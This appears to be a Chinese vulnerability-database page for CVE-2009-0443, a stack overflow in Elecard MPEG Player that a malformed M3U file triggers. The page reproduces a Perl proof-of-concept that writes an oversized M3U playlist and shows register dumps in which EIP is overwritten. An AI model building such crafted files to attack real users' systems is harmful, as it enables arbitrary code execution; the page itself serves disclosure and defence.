Elecard MPEG Player M3U文件处理栈溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117326 漏洞类型 缓冲区溢出
发布时间 2009-02-02 更新时间 2009-02-10
CVE编号 CVE-2009-0443 CNNVD-ID CNNVD-200902-211
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/7942
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-211
|漏洞详情
ElecardMPEGPlayer是俄罗斯Elecard公司的一款流行的视频播放器。如果用户受骗使用ElecardMPEGPlayer打开了畸形的M3U文件的话,就可以触发栈溢出,导致执行任意指令。
|漏洞EXP
#!/usr/bin/perl
#Elecard AVC HD PLAYER m3u/xpl file Local Stack Overflow POC
#Found By AlpHaNiX
#From NullArea.Net
###########################
#    proof of concept    
###########################
#Stack Get Overflowed Starting from 2353 char
#EIP overitten
#------------------
#     REGISTRES   
#------------------
#EAX 00000000
#ECX 41414141
#EDX 775A104D ntdll.775A104D
#EBX 00000000
#ESP 0012BC9C
#EBP 0012BCBC
#ESI 00000000
#EDI 00000000
#EIP 41414141
#------------------
#  Dump From Stack
#------------------
#0012D000   41414141
#0012D004   41414141
#0012D008   41414141
#0012D00C   41414141
#0012D010   41414141
#0012D014   41414141
#0012D018   41414141
#0012D01C   41414141
#0012D020   41414141
#0012D024   41414141
#0012D028   41414141

my $file = "alpix.m3u" ;
my $poc="http://"."A" x 2353 ;
open(alpix, ">>$file") or die "Cannot open $file";
print alpix $poc;
close(alpix);
print "\n[+] done ! , $file created";

# milw0rm.com [2009-02-02]
|参考资料

来源:BID
名称:33089
链接:http://www.securityfocus.com/bid/33089
来源:MILW0RM
名称:7942
链接:http://www.milw0rm.com/exploits/7942
来源:SECUNIA
名称:33742
链接:http://secunia.com/advisories/33742
来源:OSVDB
名称:51717
链接:http://osvdb.org/51717